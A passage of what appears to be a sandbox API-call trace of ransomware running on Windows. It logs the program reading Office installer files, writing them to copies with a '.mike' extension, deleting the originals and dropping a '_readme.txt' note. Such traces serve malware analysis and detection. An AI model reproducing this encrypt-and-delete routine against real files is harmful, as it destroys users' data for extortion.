SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0041.266] GetFileType (hFile=0x264) returned 0x1 [0041.266] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af058*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af058*=0) returned 0x220 [0041.266] WriteFile (in: hFile=0x264, lpBuffer=0x211d678*, nNumberOfBytesToWrite=0x340, lpNumberOfBytesWritten=0x2af104, lpOverlapped=0x0 | out: lpBuffer=0x211d678*, lpNumberOfBytesWritten=0x2af104*=0x340, lpOverlapped=0x0) returned 1 [0041.267] CloseHandle (hObject=0x264) returned 1 [0041.267] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb98, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml.mike", lpFilePart=0x0) returned 0x54 [0041.267] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af08c) returned 1 [0041.267] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemuiset.xml.mike"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0041.267] GetFileType (hFile=0x264) returned 0x1 [0041.267] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af088) returned 1 [0041.268] GetFileType (hFile=0x264) returned 0x1 [0041.268] WriteFile (in: hFile=0x264, lpBuffer=0x21208bc*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af134, lpOverlapped=0x0 | out: lpBuffer=0x21208bc*, lpNumberOfBytesWritten=0x2af134*=0x20c, lpOverlapped=0x0) returned 1 [0041.269] CloseHandle (hObject=0x264) returned 1 [0041.269] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml", nBufferLength=0x105, lpBuffer=0x2aecfc, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml", lpFilePart=0x0) returned 0x4f [0041.269] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml.mike", nBufferLength=0x105, lpBuffer=0x2aed20, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml.mike", lpFilePart=0x0) returned 0x54 [0041.269] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0041.269] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemuiset.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af1fc | out: lpFileInformation=0x2af1fc*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe2cb5380, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe2cb5380, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe2cdb4e0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x560)) returned 1 [0041.269] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0041.269] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml", nBufferLength=0x105, lpBuffer=0x2aecfc, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml", lpFilePart=0x0) returned 0x4f [0041.270] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml.mike", nBufferLength=0x105, lpBuffer=0x2aed1c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml.mike", lpFilePart=0x0) returned 0x54 [0041.270] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1c8) returned 1 [0041.270] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemuiset.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2122098 | out: lpFileInformation=0x2122098*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe2cb5380, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe2cb5380, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe2cdb4e0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x560)) returned 1 [0041.270] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1c4) returned 1 [0041.270] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml", nBufferLength=0x105, lpBuffer=0x2aeca0, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml", lpFilePart=0x0) returned 0x4f [0041.270] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml", dwFileAttributes=0x80) returned 1 [0041.270] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml", nBufferLength=0x105, lpBuffer=0x2aed28, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml", lpFilePart=0x0) returned 0x4f [0041.270] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemuiset.xml")) returned 1 [0041.271] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml", nBufferLength=0x105, lpBuffer=0x2aed20, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml", lpFilePart=0x0) returned 0x4f [0041.271] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0041.271] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemuiset.xml"), fInfoLevelId=0x0, lpFileInformation=0x2af1fc | out: lpFileInformation=0x2af1fc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0041.271] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0041.271] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml", nBufferLength=0x105, lpBuffer=0x2aecfc, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml", lpFilePart=0x0) returned 0x4f [0041.271] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\_readme.txt", nBufferLength=0x105, lpBuffer=0x2aebbc, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\_readme.txt", lpFilePart=0x0) returned 0x4a [0041.271] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0b0) returned 1 [0041.271] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\_readme.txt" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x264 [0041.272] GetFileType (hFile=0x264) returned 0x1 [0041.272] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ac) returned 1 [0041.272] GetFileType (hFile=0x264) returned 0x1 [0041.272] WriteFile (in: hFile=0x264, lpBuffer=0x2123dd4*, nNumberOfBytesToWrite=0x45e, lpNumberOfBytesWritten=0x2af148, lpOverlapped=0x0 | out: lpBuffer=0x2123dd4*, lpNumberOfBytesWritten=0x2af148*=0x45e, lpOverlapped=0x0) returned 1 [0041.273] CloseHandle (hObject=0x264) returned 1 [0041.273] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\osetupui.dll", nBufferLength=0x105, lpBuffer=0x2aecf4, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\osetupui.dll", lpFilePart=0x0) returned 0x4b [0041.273] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\pss10r.chm", nBufferLength=0x105, lpBuffer=0x2aecf4, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\pss10r.chm", lpFilePart=0x0) returned 0x49 [0041.273] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\setup.chm", nBufferLength=0x105, lpBuffer=0x2aecf4, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\setup.chm", lpFilePart=0x0) returned 0x48 [0041.273] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aecf4, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0041.274] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aecf4, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0041.274] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aec70, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0041.274] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af164) returned 1 [0041.274] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0041.274] GetFileType (hFile=0x264) returned 0x1 [0041.274] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af160) returned 1 [0041.274] GetFileType (hFile=0x264) returned 0x1 [0041.274] CloseHandle (hObject=0x264) returned 1 [0041.274] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aecf4, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0041.274] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aed1c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0041.274] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x2aeca4, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0041.274] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1f8) returned 1 [0041.274] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214 | out: lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214) returned 1 [0041.274] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1f4) returned 1 [0041.274] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1c8) returned 1 [0041.275] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\setup.xml"), fInfoLevelId=0x0, lpFileInformation=0x212c298 | out: lpFileInformation=0x212c298*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x42c75f00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x42c75f00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xe8728670, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x2488)) returned 1 [0041.275] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1c4) returned 1 [0041.275] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aed1c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0041.275] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1c8) returned 1 [0041.275] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\setup.xml"), fInfoLevelId=0x0, lpFileInformation=0x212c5b4 | out: lpFileInformation=0x212c5b4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x42c75f00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x42c75f00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xe8728670, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x2488)) returned 1 [0041.275] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1c4) returned 1 [0041.275] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aecfc, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0041.275] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml.mike", nBufferLength=0x105, lpBuffer=0x2aed20, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml.mike", lpFilePart=0x0) returned 0x4d [0041.275] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0041.275] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\setup.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af1fc | out: lpFileInformation=0x2af1fc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0041.275] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0041.275] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aed00, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0041.275] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aecf8, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0041.275] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aec84, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0041.276] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml.mike", nBufferLength=0x105, lpBuffer=0x2aec88, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml.mike", lpFilePart=0x0) returned 0x4d [0041.276] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0e8) returned 1 [0041.276] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\setup.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af164 | out: lpFileInformation=0x2af164*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0041.276] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0e4) returned 1 [0041.276] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml.mike", lpFilePart=0x0) returned 0x4d [0041.276] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0041.276] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\setup.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0041.276] GetFileType (hFile=0x264) returned 0x1 [0041.276] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0041.276] GetFileType (hFile=0x264) returned 0x1 [0041.276] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af058*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af058*=0) returned 0x0 [0041.276] WriteFile (in: hFile=0x264, lpBuffer=0x212d430*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af104, lpOverlapped=0x0 | out: lpBuffer=0x212d430*, lpNumberOfBytesWritten=0x2af104*=0x220, lpOverlapped=0x0) returned 1 [0041.277] CloseHandle (hObject=0x264) returned 1 [0041.277] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af130) returned 1 [0041.277] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\setup.xml"), fInfoLevelId=0x0, lpFileInformation=0x212cf38 | out: lpFileInformation=0x212cf38*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x42c75f00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x42c75f00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xe8728670, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x2488)) returned 1 [0041.277] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af12c) returned 1 [0041.277] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aeb80, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0041.277] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af074) returned 1 [0041.278] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0041.278] GetFileType (hFile=0x264) returned 0x1 [0041.278] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af070) returned 1 [0041.278] GetFileType (hFile=0x264) returned 0x1 [0041.278] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af104*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af104*=0) returned 0x0 [0041.278] ReadFile (in: hFile=0x264, lpBuffer=0x212e558, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af110, lpOverlapped=0x0 | out: lpBuffer=0x212e558*, lpNumberOfBytesRead=0x2af110*=0x2488, lpOverlapped=0x0) returned 1 [0041.293] CloseHandle (hObject=0x264) returned 1 [0041.294] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml.mike", lpFilePart=0x0) returned 0x4d [0041.294] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0041.294] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\setup.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0041.294] GetFileType (hFile=0x264) returned 0x1 [0041.294] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0041.294] GetFileType (hFile=0x264) returned 0x1 [0041.294] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af058*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af058*=0) returned 0x220 [0041.294] WriteFile (in: hFile=0x264, lpBuffer=0x213c978*, nNumberOfBytesToWrite=0x2490, lpNumberOfBytesWritten=0x2af124, lpOverlapped=0x0 | out: lpBuffer=0x213c978*, lpNumberOfBytesWritten=0x2af124*=0x2490, lpOverlapped=0x0) returned 1 [0041.294] CloseHandle (hObject=0x264) returned 1 [0041.295] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb98, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml.mike", lpFilePart=0x0) returned 0x4d [0041.295] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af08c) returned 1 [0041.295] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\setup.xml.mike"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0041.295] GetFileType (hFile=0x264) returned 0x1 [0041.295] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af088) returned 1 [0041.296] GetFileType (hFile=0x264) returned 0x1 [0041.297] WriteFile (in: hFile=0x264, lpBuffer=0x2141160*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af134, lpOverlapped=0x0 | out: lpBuffer=0x2141160*, lpNumberOfBytesWritten=0x2af134*=0x20c, lpOverlapped=0x0) returned 1 [0041.297] CloseHandle (hObject=0x264) returned 1 [0041.297] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aecfc, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0041.297] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml.mike", nBufferLength=0x105, lpBuffer=0x2aed20, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml.mike", lpFilePart=0x0) returned 0x4d [0041.297] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0041.298] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\setup.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af1fc | out: lpFileInformation=0x2af1fc*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe2cdb4e0, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe2cdb4e0, 